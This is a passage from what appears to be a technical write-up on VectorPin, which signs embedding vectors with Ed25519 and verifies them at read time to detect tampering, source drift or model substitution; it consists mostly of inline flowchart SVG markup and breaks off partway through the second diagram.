<p>The idea is straightforward. When the embedding service produces a vector, it signs a canonical commitment over the source content hash, the model identifier, the vector hash, the dimension and dtype, a timestamp, the key id, and any operator-provided metadata. The signature is Ed25519 over a deterministic byte form of those fields. Verification on read recomputes the relevant hashes and checks the signature. Any post-embedding modification breaks <code class="language-plaintext highlighter-rouge">vec_hash</code> and triggers a <code class="language-plaintext highlighter-rouge">VECTOR_TAMPERED</code> outcome.</p>

<svg class="flowchart" id="mermaid-svg" width="100%" xmlns="http://www.w3.org/2000/svg" style="max-width: 305.2265625px;" viewBox="0 0 305.2265625 980.8495483398438" role="graphics-document document" aria-roledescription="flowchart-v2" xmlns:xlink="http://www.w3.org/1999/xlink"><style xmlns="http://www.w3.org/1999/xhtml">@import url("https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css");</style><style>#mermaid-svg{font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#ccc;}@keyframes edge-animation-frame{from{stroke-dashoffset:0;}}@keyframes dash{to{stroke-dashoffset:0;}}#mermaid-svg .edge-animation-slow{stroke-dasharray:9,5!important;stroke-dashoffset:900;animation:dash 50s linear infinite;stroke-linecap:round;}#mermaid-svg .edge-animation-fast{stroke-dasharray:9,5!important;stroke-dashoffset:900;animation:dash 20s linear infinite;stroke-linecap:round;}#mermaid-svg .error-icon{fill:#a44141;}#mermaid-svg .error-text{fill:#ddd;stroke:#ddd;}#mermaid-svg .edge-thickness-normal{stroke-width:1px;}#mermaid-svg .edge-thickness-thick{stroke-width:3.5px;}#mermaid-svg .edge-pattern-solid{stroke-dasharray:0;}#mermaid-svg .edge-thickness-invisible{stroke-width:0;fill:none;}#mermaid-svg .edge-pattern-dashed{stroke-dasharray:3;}#mermaid-svg .edge-pattern-dotted{stroke-dasharray:2;}#mermaid-svg .marker{fill:lightgrey;stroke:lightgrey;}#mermaid-svg .marker.cross{stroke:lightgrey;}#mermaid-svg svg{font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;}#mermaid-svg p{margin:0;}#mermaid-svg .label{font-family:"trebuchet ms",verdana,arial,sans-serif;color:#ccc;}#mermaid-svg .cluster-label text{fill:#F9FFFE;}#mermaid-svg .cluster-label span{color:#F9FFFE;}#mermaid-svg .cluster-label span p{background-color:transparent;}#mermaid-svg .label text,#mermaid-svg span{fill:#ccc;color:#ccc;}#mermaid-svg .node rect,#mermaid-svg .node circle,#mermaid-svg .node ellipse,#mermaid-svg .node polygon,#mermaid-svg .node path{fill:#1f2020;stroke:#ccc;stroke-width:1px;}#mermaid-svg .rough-node .label text,#mermaid-svg .node .label text,#mermaid-svg .image-shape .label,#mermaid-svg .icon-shape .label{text-anchor:middle;}#mermaid-svg .node .katex path{fill:#000;stroke:#000;stroke-width:1px;}#mermaid-svg .rough-node .label,#mermaid-svg .node .label,#mermaid-svg .image-shape .label,#mermaid-svg .icon-shape .label{text-align:center;}#mermaid-svg .node.clickable{cursor:pointer;}#mermaid-svg .root .anchor path{fill:lightgrey!important;stroke-width:0;stroke:lightgrey;}#mermaid-svg .arrowheadPath{fill:lightgrey;}#mermaid-svg .edgePath .path{stroke:lightgrey;stroke-width:2.0px;}#mermaid-svg .flowchart-link{stroke:lightgrey;fill:none;}#mermaid-svg .edgeLabel{background-color:hsl(0, 0%, 34.4117647059%);text-align:center;}#mermaid-svg .edgeLabel p{background-color:hsl(0, 0%, 34.4117647059%);}#mermaid-svg .edgeLabel rect{opacity:0.5;background-color:hsl(0, 0%, 34.4117647059%);fill:hsl(0, 0%, 34.4117647059%);}#mermaid-svg .labelBkg{background-color:rgba(87.75, 87.75, 87.75, 0.5);}#mermaid-svg .cluster rect{fill:hsl(180, 1.5873015873%, 28.3529411765%);stroke:rgba(255, 255, 255, 0.25);stroke-width:1px;}#mermaid-svg .cluster text{fill:#F9FFFE;}#mermaid-svg .cluster span{color:#F9FFFE;}#mermaid-svg div.mermaidTooltip{position:absolute;text-align:center;max-width:200px;padding:2px;font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:12px;background:hsl(20, 1.5873015873%, 12.3529411765%);border:1px solid rgba(255, 255, 255, 0.25);border-radius:2px;pointer-events:none;z-index:100;}#mermaid-svg .flowchartTitleText{text-anchor:middle;font-size:18px;fill:#ccc;}#mermaid-svg rect.text{fill:none;stroke-width:0;}#mermaid-svg .icon-shape,#mermaid-svg .image-shape{background-color:hsl(0, 0%, 34.4117647059%);text-align:center;}#mermaid-svg .icon-shape p,#mermaid-svg .image-shape p{background-color:hsl(0, 0%, 34.4117647059%);padding:2px;}#mermaid-svg .icon-shape rect,#mermaid-svg .image-shape rect{opacity:0.5;background-color:hsl(0, 0%, 34.4117647059%);fill:hsl(0, 0%, 34.4117647059%);}#mermaid-svg .label-icon{display:inline-block;height:1em;overflow:visible;vertical-align:-0.125em;}#mermaid-svg .node .label-icon path{fill:currentColor;stroke:revert;stroke-width:revert;}#mermaid-svg :root{--mermaid-font-family:"trebuchet ms",verdana,arial,sans-serif;}</style><g><marker id="mermaid-svg_flowchart-v2-pointEnd" class="marker flowchart-v2" viewBox="0 0 10 10" refX="5" refY="5" markerUnits="userSpaceOnUse" markerWidth="8" markerHeight="8" orient="auto"><path d="M 0 0 L 10 5 L 0 10 z" class="arrowMarkerPath" style="stroke-width: 1; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-pointStart" class="marker flowchart-v2" viewBox="0 0 10 10" refX="4.5" refY="5" markerUnits="userSpaceOnUse" markerWidth="8" markerHeight="8" orient="auto"><path d="M 0 5 L 10 10 L 10 0 z" class="arrowMarkerPath" style="stroke-width: 1; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-circleEnd" class="marker flowchart-v2" viewBox="0 0 10 10" refX="11" refY="5" markerUnits="userSpaceOnUse" markerWidth="11" markerHeight="11" orient="auto"><circle cx="5" cy="5" r="5" class="arrowMarkerPath" style="stroke-width: 1; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-circleStart" class="marker flowchart-v2" viewBox="0 0 10 10" refX="-1" refY="5" markerUnits="userSpaceOnUse" markerWidth="11" markerHeight="11" orient="auto"><circle cx="5" cy="5" r="5" class="arrowMarkerPath" style="stroke-width: 1; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-crossEnd" class="marker cross flowchart-v2" viewBox="0 0 11 11" refX="12" refY="5.2" markerUnits="userSpaceOnUse" markerWidth="11" markerHeight="11" orient="auto"><path d="M 1,1 l 9,9 M 10,1 l -9,9" class="arrowMarkerPath" style="stroke-width: 2; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-crossStart" class="marker cross flowchart-v2" viewBox="0 0 11 11" refX="-1" refY="5.2" markerUnits="userSpaceOnUse" markerWidth="11" markerHeight="11" orient="auto"><path d="M 1,1 l 9,9 M 10,1 l -9,9" class="arrowMarkerPath" style="stroke-width: 2; stroke-dasharray: 1, 0;" /></marker><g class="root"><g class="clusters" /><g class="edgePaths"><path d="M133.61,62L128.423,66.167C123.235,70.333,112.86,78.667,107.672,86.333C102.484,94,102.484,101,102.484,104.5L102.484,108" id="L_SRC_EMB_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_SRC_EMB_0" data-points="W3sieCI6MTMzLjYxMDQyNjY4MjY5MjMyLCJ5Ijo2Mn0seyJ4IjoxMDIuNDg0Mzc1LCJ5Ijo4N30seyJ4IjoxMDIuNDg0Mzc1LCJ5IjoxMTJ9XQ==" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M102.484,166L102.484,172.167C102.484,178.333,102.484,190.667,102.484,202.333C102.484,214,102.484,225,102.484,230.5L102.484,236" id="L_EMB_VEC_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_EMB_VEC_0" data-points="W3sieCI6MTAyLjQ4NDM3NSwieSI6MTY2fSx7IngiOjEwMi40ODQzNzUsInkiOjIwM30seyJ4IjoxMDIuNDg0Mzc1LCJ5IjoyNDB9XQ==" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M102.484,294L102.484,298.167C102.484,302.333,102.484,310.667,105.602,318.493C108.719,326.318,114.953,333.637,118.07,337.296L121.187,340.955" id="L_VEC_SIGN_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_VEC_SIGN_0" data-points="W3sieCI6MTAyLjQ4NDM3NSwieSI6Mjk0fSx7IngiOjEwMi40ODQzNzUsInkiOjMxOX0seyJ4IjoxMjMuNzgxMTQ3MjAzOTQ3MzcsInkiOjM0NH1d" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M200.843,62L206.03,66.167C211.218,70.333,221.593,78.667,226.781,91.5C231.969,104.333,231.969,121.667,231.969,141C231.969,160.333,231.969,181.667,231.969,203C231.969,224.333,231.969,245.667,231.969,265C231.969,284.333,231.969,301.667,228.852,313.993C225.734,326.318,219.5,333.637,216.383,337.296L213.266,340.955" id="L_SRC_SIGN_0" class=" edge-thickness-normal edge-pattern-dotted edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_SRC_SIGN_0" data-points="W3sieCI6MjAwLjg0MjY5ODMxNzMwNzY4LCJ5Ijo2Mn0seyJ4IjoyMzEuOTY4NzUsInkiOjg3fSx7IngiOjIzMS45Njg3NSwieSI6MTM5fSx7IngiOjIzMS45Njg3NSwieSI6MjAzfSx7IngiOjIzMS45Njg3NSwieSI6MjY3fSx7IngiOjIzMS45Njg3NSwieSI6MzE5fSx7IngiOjIxMC42NzE5Nzc3OTYwNTI2MywieSI6MzQ0fV0=" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M167.227,446L167.227,450.167C167.227,454.333,167.227,462.667,167.227,470.333C167.227,478,167.227,485,167.227,488.5L167.227,492" id="L_SIGN_STORE_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_SIGN_STORE_0" data-points="W3sieCI6MTY3LjIyNjU2MjUsInkiOjQ0Nn0seyJ4IjoxNjcuMjI2NTYyNSwieSI6NDcxfSx7IngiOjE2Ny4yMjY1NjI1LCJ5Ijo0OTZ9XQ==" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M167.227,595.928L167.227,600.094C167.227,604.261,167.227,612.594,167.227,620.261C167.227,627.928,167.227,634.928,167.227,638.428L167.227,641.928" id="L_STORE_READ_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_STORE_READ_0" data-points="W3sieCI6MTY3LjIyNjU2MjUsInkiOjU5NS45Mjc2ODA5NjkyMzgzfSx7IngiOjE2Ny4yMjY1NjI1LCJ5Ijo2MjAuOTI3NjgwOTY5MjM4M30seyJ4IjoxNjcuMjI2NTYyNSwieSI6NjQ1LjkyNzY4MDk2OTIzODN9XQ==" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M167.227,699.928L167.227,704.094C167.227,708.261,167.227,716.594,167.227,724.261C167.227,731.928,167.227,738.928,167.227,742.428L167.227,745.928" id="L_READ_VERIFY_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_READ_VERIFY_0" data-points="W3sieCI6MTY3LjIyNjU2MjUsInkiOjY5OS45Mjc2ODA5NjkyMzgzfSx7IngiOjE2Ny4yMjY1NjI1LCJ5Ijo3MjQuOTI3NjgwOTY5MjM4M30seyJ4IjoxNjcuMjI2NTYyNSwieSI6NzQ5LjkyNzY4MDk2OTIzODN9XQ==" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M167.227,803.928L167.227,808.094C167.227,812.261,167.227,820.594,167.227,828.261C167.227,835.928,167.227,842.928,167.227,846.428L167.227,849.928" id="L_VERIFY_OUT_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_VERIFY_OUT_0" data-points="W3sieCI6MTY3LjIyNjU2MjUsInkiOjgwMy45Mjc2ODA5NjkyMzgzfSx7IngiOjE2Ny4yMjY1NjI1LCJ5Ijo4MjguOTI3NjgwOTY5MjM4M30seyJ4IjoxNjcuMjI2NTYyNSwieSI6ODUzLjkyNzY4MDk2OTIzODJ9XQ==" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /></g><g class="edgeLabels"><g class="edgeLabel"><g class="label" data-id="L_SRC_EMB_0" transform="translate(0, 0)"><foreignObject width="0" height="0"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "></span></div></foreignObject></g></g><g class="edgeLabel"><g class="label" data-id="L_EMB_VEC_0" transform="translate(0, 0)"><foreignObject width="0" height="0"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "></span></div></foreignObject></g></g><g class="edgeLabel"><g class="label" data-id="L_VEC_SIGN_0" transform="translate(0, 0)"><foreignObject width="0" height="0"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "></span></div></foreignObject></g></g><g class="edgeLabel" transform="translate(231.96875, 203)"><g class="label" data-id="L_SRC_SIGN_0" transform="translate(-32.4609375, -12)"><foreignObject width="64.921875" height="24"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "><p>src_hash</p></span></div></foreignObject></g></g><g class="edgeLabel"><g class="label" data-id="L_SIGN_STORE_0" transform="translate(0, 0)"><foreignObject width="0" height="0"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "></span></div></foreignObject></g></g><g class="edgeLabel"><g class="label" data-id="L_STORE_READ_0" transform="translate(0, 0)"><foreignObject width="0" height="0"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "></span></div></foreignObject></g></g><g class="edgeLabel"><g class="label" data-id="L_READ_VERIFY_0" transform="translate(0, 0)"><foreignObject width="0" height="0"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "></span></div></foreignObject></g></g><g class="edgeLabel"><g class="label" data-id="L_VERIFY_OUT_0" transform="translate(0, 0)"><foreignObject width="0" height="0"><div xmlns="http://www.w3.org/1999/xhtml" class="labelBkg" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="edgeLabel "></span></div></foreignObject></g></g></g><g class="nodes"><g class="node default  " id="flowchart-SRC-0" transform="translate(167.2265625, 35)"><rect class="basic label-container" style="" x="-78.921875" y="-27" width="157.84375" height="54" /><g class="label" style="" transform="translate(-48.921875, -12)"><rect /><foreignObject width="97.84375" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>Source chunk</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-EMB-1" transform="translate(102.484375, 139)"><rect class="basic label-container" style="" x="-94.484375" y="-27" width="188.96875" height="54" /><g class="label" style="" transform="translate(-64.484375, -12)"><rect /><foreignObject width="128.96875" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>Embedding model</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-VEC-3" transform="translate(102.484375, 267)"><rect class="basic label-container" style="" x="-58.90625" y="-27" width="117.8125" height="54" /><g class="label" style="" transform="translate(-28.90625, -12)"><rect /><foreignObject width="57.8125" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>Vector v</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-SIGN-5" transform="translate(167.2265625, 395)"><rect class="basic label-container" style="" x="-130" y="-51" width="260" height="102" /><g class="label" style="" transform="translate(-100, -36)"><rect /><foreignObject width="200" height="72"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table; white-space: break-spaces; line-height: 1.5; max-width: 200px; text-align: center; width: 200px;"><span class="nodeLabel "><p>VectorPin sign<br />Ed25519 over canonical bytes</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-STORE-9" transform="translate(167.2265625, 545.9638404846191)"><path d="M0,12.312059887077334 a60.6484375,12.312059887077334 0,0,0 121.296875,0 a60.6484375,12.312059887077334 0,0,0 -121.296875,0 l0,75.31205988707734 a60.6484375,12.312059887077334 0,0,0 121.296875,0 l0,-75.31205988707734" class="basic label-container" style="" label-offset-y="12.312059887077334" transform="translate(-60.6484375, -49.968089830616)" /><g class="label" style="" transform="translate(-53.1484375, -14)"><rect /><foreignObject width="106.296875" height="48"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>Vector DB<br />+ pin metadata</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-READ-11" transform="translate(167.2265625, 672.9276809692383)"><rect class="basic label-container" style="" x="-66.4609375" y="-27" width="132.921875" height="54" /><g class="label" style="" transform="translate(-36.4609375, -12)"><rect /><foreignObject width="72.921875" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>Read time</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-VERIFY-13" transform="translate(167.2265625, 776.9276809692383)"><rect class="basic label-container" style="" x="-85.578125" y="-27" width="171.15625" height="54" /><g class="label" style="" transform="translate(-55.578125, -12)"><rect /><foreignObject width="111.15625" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>VectorPin verify</p></span></div></foreignObject></g></g><g class="node default  " id="flowchart-OUT-15" transform="translate(167.2265625, 913.3886184692383)"><polygon points="59.4609375,0 118.921875,-59.4609375 59.4609375,-118.921875 0,-59.4609375" class="label-container" transform="translate(-58.9609375, 59.4609375)" /><g class="label" style="" transform="translate(-32.4609375, -12)"><rect /><foreignObject width="64.921875" height="24"><div xmlns="http://www.w3.org/1999/xhtml" style="display: table-cell; white-space: nowrap; line-height: 1.5; max-width: 200px; text-align: center;"><span class="nodeLabel "><p>Outcome</p></span></div></foreignObject></g></g></g></g></g></svg>

<p>The verifier returns distinct outcomes for distinct failures: <code class="language-plaintext highlighter-rouge">SIGNATURE_INVALID</code> for forgery, <code class="language-plaintext highlighter-rouge">VECTOR_TAMPERED</code> for post-pin modification, <code class="language-plaintext highlighter-rouge">SOURCE_MISMATCH</code> for source drift, <code class="language-plaintext highlighter-rouge">MODEL_MISMATCH</code> for cross-model substitution, <code class="language-plaintext highlighter-rouge">UNKNOWN_KEY</code> for unregistered signers. Operators route on these differently. A vector tampering is potential steganography. A model mismatch is potential cross-model fragmentation. A source mismatch may simply be upstream pipeline drift.</p>

<svg class="flowchart" id="mermaid-svg" width="100%" xmlns="http://www.w3.org/2000/svg" style="max-width: 1041.265625px;" viewBox="0 0 1041.265625 1240.09375" role="graphics-document document" aria-roledescription="flowchart-v2" xmlns:xlink="http://www.w3.org/1999/xlink"><style xmlns="http://www.w3.org/1999/xhtml">@import url("https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css");</style><style>#mermaid-svg{font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#ccc;}@keyframes edge-animation-frame{from{stroke-dashoffset:0;}}@keyframes dash{to{stroke-dashoffset:0;}}#mermaid-svg .edge-animation-slow{stroke-dasharray:9,5!important;stroke-dashoffset:900;animation:dash 50s linear infinite;stroke-linecap:round;}#mermaid-svg .edge-animation-fast{stroke-dasharray:9,5!important;stroke-dashoffset:900;animation:dash 20s linear infinite;stroke-linecap:round;}#mermaid-svg .error-icon{fill:#a44141;}#mermaid-svg .error-text{fill:#ddd;stroke:#ddd;}#mermaid-svg .edge-thickness-normal{stroke-width:1px;}#mermaid-svg .edge-thickness-thick{stroke-width:3.5px;}#mermaid-svg .edge-pattern-solid{stroke-dasharray:0;}#mermaid-svg .edge-thickness-invisible{stroke-width:0;fill:none;}#mermaid-svg .edge-pattern-dashed{stroke-dasharray:3;}#mermaid-svg .edge-pattern-dotted{stroke-dasharray:2;}#mermaid-svg .marker{fill:lightgrey;stroke:lightgrey;}#mermaid-svg .marker.cross{stroke:lightgrey;}#mermaid-svg svg{font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;}#mermaid-svg p{margin:0;}#mermaid-svg .label{font-family:"trebuchet ms",verdana,arial,sans-serif;color:#ccc;}#mermaid-svg .cluster-label text{fill:#F9FFFE;}#mermaid-svg .cluster-label span{color:#F9FFFE;}#mermaid-svg .cluster-label span p{background-color:transparent;}#mermaid-svg .label text,#mermaid-svg span{fill:#ccc;color:#ccc;}#mermaid-svg .node rect,#mermaid-svg .node circle,#mermaid-svg .node ellipse,#mermaid-svg .node polygon,#mermaid-svg .node path{fill:#1f2020;stroke:#ccc;stroke-width:1px;}#mermaid-svg .rough-node .label text,#mermaid-svg .node .label text,#mermaid-svg .image-shape .label,#mermaid-svg .icon-shape .label{text-anchor:middle;}#mermaid-svg .node .katex path{fill:#000;stroke:#000;stroke-width:1px;}#mermaid-svg .rough-node .label,#mermaid-svg .node .label,#mermaid-svg .image-shape .label,#mermaid-svg .icon-shape .label{text-align:center;}#mermaid-svg .node.clickable{cursor:pointer;}#mermaid-svg .root .anchor path{fill:lightgrey!important;stroke-width:0;stroke:lightgrey;}#mermaid-svg .arrowheadPath{fill:lightgrey;}#mermaid-svg .edgePath .path{stroke:lightgrey;stroke-width:2.0px;}#mermaid-svg .flowchart-link{stroke:lightgrey;fill:none;}#mermaid-svg .edgeLabel{background-color:hsl(0, 0%, 34.4117647059%);text-align:center;}#mermaid-svg .edgeLabel p{background-color:hsl(0, 0%, 34.4117647059%);}#mermaid-svg .edgeLabel rect{opacity:0.5;background-color:hsl(0, 0%, 34.4117647059%);fill:hsl(0, 0%, 34.4117647059%);}#mermaid-svg .labelBkg{background-color:rgba(87.75, 87.75, 87.75, 0.5);}#mermaid-svg .cluster rect{fill:hsl(180, 1.5873015873%, 28.3529411765%);stroke:rgba(255, 255, 255, 0.25);stroke-width:1px;}#mermaid-svg .cluster text{fill:#F9FFFE;}#mermaid-svg .cluster span{color:#F9FFFE;}#mermaid-svg div.mermaidTooltip{position:absolute;text-align:center;max-width:200px;padding:2px;font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:12px;background:hsl(20, 1.5873015873%, 12.3529411765%);border:1px solid rgba(255, 255, 255, 0.25);border-radius:2px;pointer-events:none;z-index:100;}#mermaid-svg .flowchartTitleText{text-anchor:middle;font-size:18px;fill:#ccc;}#mermaid-svg rect.text{fill:none;stroke-width:0;}#mermaid-svg .icon-shape,#mermaid-svg .image-shape{background-color:hsl(0, 0%, 34.4117647059%);text-align:center;}#mermaid-svg .icon-shape p,#mermaid-svg .image-shape p{background-color:hsl(0, 0%, 34.4117647059%);padding:2px;}#mermaid-svg .icon-shape rect,#mermaid-svg .image-shape rect{opacity:0.5;background-color:hsl(0, 0%, 34.4117647059%);fill:hsl(0, 0%, 34.4117647059%);}#mermaid-svg .label-icon{display:inline-block;height:1em;overflow:visible;vertical-align:-0.125em;}#mermaid-svg .node .label-icon path{fill:currentColor;stroke:revert;stroke-width:revert;}#mermaid-svg :root{--mermaid-font-family:"trebuchet ms",verdana,arial,sans-serif;}</style><g><marker id="mermaid-svg_flowchart-v2-pointEnd" class="marker flowchart-v2" viewBox="0 0 10 10" refX="5" refY="5" markerUnits="userSpaceOnUse" markerWidth="8" markerHeight="8" orient="auto"><path d="M 0 0 L 10 5 L 0 10 z" class="arrowMarkerPath" style="stroke-width: 1; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-pointStart" class="marker flowchart-v2" viewBox="0 0 10 10" refX="4.5" refY="5" markerUnits="userSpaceOnUse" markerWidth="8" markerHeight="8" orient="auto"><path d="M 0 5 L 10 10 L 10 0 z" class="arrowMarkerPath" style="stroke-width: 1; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-circleEnd" class="marker flowchart-v2" viewBox="0 0 10 10" refX="11" refY="5" markerUnits="userSpaceOnUse" markerWidth="11" markerHeight="11" orient="auto"><circle cx="5" cy="5" r="5" class="arrowMarkerPath" style="stroke-width: 1; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-circleStart" class="marker flowchart-v2" viewBox="0 0 10 10" refX="-1" refY="5" markerUnits="userSpaceOnUse" markerWidth="11" markerHeight="11" orient="auto"><circle cx="5" cy="5" r="5" class="arrowMarkerPath" style="stroke-width: 1; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-crossEnd" class="marker cross flowchart-v2" viewBox="0 0 11 11" refX="12" refY="5.2" markerUnits="userSpaceOnUse" markerWidth="11" markerHeight="11" orient="auto"><path d="M 1,1 l 9,9 M 10,1 l -9,9" class="arrowMarkerPath" style="stroke-width: 2; stroke-dasharray: 1, 0;" /></marker><marker id="mermaid-svg_flowchart-v2-crossStart" class="marker cross flowchart-v2" viewBox="0 0 11 11" refX="-1" refY="5.2" markerUnits="userSpaceOnUse" markerWidth="11" markerHeight="11" orient="auto"><path d="M 1,1 l 9,9 M 10,1 l -9,9" class="arrowMarkerPath" style="stroke-width: 2; stroke-dasharray: 1, 0;" /></marker><g class="root"><g class="clusters" /><g class="edgePaths"><path d="M378.594,62L378.594,66.167C378.594,70.333,378.594,78.667,378.594,86.333C378.594,94,378.594,101,378.594,104.5L378.594,108" id="L_V_Q1_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_V_Q1_0" data-points="W3sieCI6Mzc4LjU5Mzc1LCJ5Ijo2Mn0seyJ4IjozNzguNTkzNzUsInkiOjg3fSx7IngiOjM3OC41OTM3NSwieSI6MTEyfV0=" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M321.104,223.26L287.429,239.009C253.754,254.757,186.404,286.253,152.73,317.361C119.055,348.469,119.055,379.188,119.055,394.547L119.055,409.906" id="L_Q1_O1_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_Q1_O1_0" data-points="W3sieCI6MzIxLjEwNDEyMDMwNTgwMjI3LCJ5IjoyMjMuMjYwMzcwMzA1ODAyMjR9LHsieCI6MTE5LjA1NDY4NzUsInkiOjMxNy43NX0seyJ4IjoxMTkuMDU0Njg3NSwieSI6NDEzLjkwNjI1fV0=" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M378.594,280.75L378.594,286.917C378.594,293.083,378.594,305.417,378.594,326.943C378.594,348.469,378.594,379.188,378.594,394.547L378.594,409.906" id="L_Q1_O2_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_Q1_O2_0" data-points="W3sieCI6Mzc4LjU5Mzc1LCJ5IjoyODAuNzV9LHsieCI6Mzc4LjU5Mzc1LCJ5IjozMTcuNzV9LHsieCI6Mzc4LjU5Mzc1LCJ5Ijo0MTMuOTA2MjV9XQ==" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M435.141,224.203L466.823,239.794C498.506,255.385,561.87,286.568,593.552,307.659C625.234,328.75,625.234,339.75,625.234,345.25L625.234,350.75" id="L_Q1_Q2_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_Q1_Q2_0" data-points="W3sieCI6NDM1LjE0MTA4NDczNDQyODcsInkiOjIyNC4yMDI2NjUyNjU1NzEyNn0seyJ4Ijo2MjUuMjM0Mzc1LCJ5IjozMTcuNzV9LHsieCI6NjI1LjIzNDM3NSwieSI6MzU0Ljc1fV0=" marker-end="url(#mermaid-svg_flowchart-v2-pointEnd)" /><path d="M576.945,502.773L563.179,516.988C549.414,531.203,521.883,559.633,508.117,588.909C494.352,618.185,494.352,648.307,494.352,663.368L494.352,678.43" id="L_Q2_O3_0" class=" edge-thickness-normal edge-pattern-solid edge-thickness-normal edge-pattern-solid flowchart-link" style=";" data-edge="true" data-et="edge" data-id="L_Q2_O3_0" 